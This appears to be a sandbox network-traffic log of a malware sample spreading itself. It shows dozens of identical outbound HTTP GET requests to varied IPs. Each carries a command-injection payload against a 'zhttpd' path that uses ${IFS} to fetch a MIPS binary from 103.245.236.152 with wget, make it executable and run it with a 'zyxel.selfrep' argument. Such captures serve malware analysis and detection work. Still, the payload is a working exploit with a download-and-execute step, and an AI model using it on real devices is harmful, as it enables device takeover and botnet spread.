                                          Jan 14, 2024 15:46:03.749931097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1376192.168.2.2346954123.74.11.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749957085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1377192.168.2.2350148149.255.189.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749978065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1378192.168.2.2360180145.135.175.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750025988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1379192.168.2.234992263.103.242.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750050068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1380192.168.2.235615874.153.163.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750067949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1381192.168.2.2353112196.87.42.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750094891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1382192.168.2.234918653.113.224.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750139952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1383192.168.2.2338192219.54.63.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750139952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1384192.168.2.2360114153.255.166.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750166893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1385192.168.2.235834073.31.226.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750168085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1386192.168.2.234423265.224.232.111443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750204086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1387192.168.2.235759485.94.120.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750204086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1388192.168.2.2339590161.217.135.195443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750261068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1389192.168.2.234644038.184.252.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750289917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1390192.168.2.23539202.10.173.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750317097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1391192.168.2.2349582147.172.13.60443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750351906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1392192.168.2.2360494129.12.24.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750369072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1393192.168.2.2350610110.157.229.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750406027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1394192.168.2.2333312132.123.224.108443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750435114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1395192.168.2.2335482169.196.224.236443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750452042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1396192.168.2.23453841.42.222.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750489950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1397192.168.2.235783667.74.97.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750514030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1398192.168.2.233315423.233.55.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750530958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1399192.168.2.2360698146.132.130.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750559092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1400192.168.2.233330246.76.160.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750583887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1401192.168.2.235781612.134.163.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750592947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1402192.168.2.2343458223.157.107.110443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750618935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1403192.168.2.2340398104.52.213.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750636101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1404192.168.2.234827040.140.183.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750689030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1405192.168.2.2351658174.26.249.113443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750694990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1406192.168.2.233837648.103.60.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750714064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1407192.168.2.2334060131.179.27.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750732899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1408192.168.2.234555441.226.6.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750751972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1409192.168.2.2342242112.58.217.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750797033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1410192.168.2.234072668.88.26.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750817060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1411192.168.2.2346048223.63.65.242443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750850916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1412192.168.2.2339188192.92.2.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750866890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1413192.168.2.2333886147.252.72.39443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750900030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1414192.168.2.23462329.22.46.73443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750915051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1415192.168.2.235998247.54.23.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750958920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1416192.168.2.235446673.83.92.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750961065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1417192.168.2.2334462188.85.76.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.750991106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1418192.168.2.234669441.248.73.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751000881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1419192.168.2.2334752130.11.255.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751029015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1420192.168.2.234331449.129.94.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751058102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1421192.168.2.2358166194.152.0.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751087904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1422192.168.2.234269218.81.167.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751116991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1423192.168.2.2340450123.87.184.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751132965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1424192.168.2.2335892210.168.27.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751142025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1425192.168.2.2335538213.255.22.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751204014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1426192.168.2.2353286185.26.194.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751204014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1427192.168.2.234139297.254.164.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751235962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1428192.168.2.2347558178.103.72.23443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751235962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1429192.168.2.234738438.218.207.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751281023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1430192.168.2.234396675.229.222.171443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751310110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1431192.168.2.233954647.198.144.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751347065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1432192.168.2.234341491.176.156.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751372099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1433192.168.2.2341690159.19.202.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751394033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1434192.168.2.2341170198.72.2.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751426935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1435192.168.2.2350472113.235.186.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751461029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1436192.168.2.2347646183.61.100.233443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751472950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1437192.168.2.2344016197.79.52.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.751519918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1438192.168.2.2350144208.70.154.93443
                                          TimestampBytes transferredDirectionData
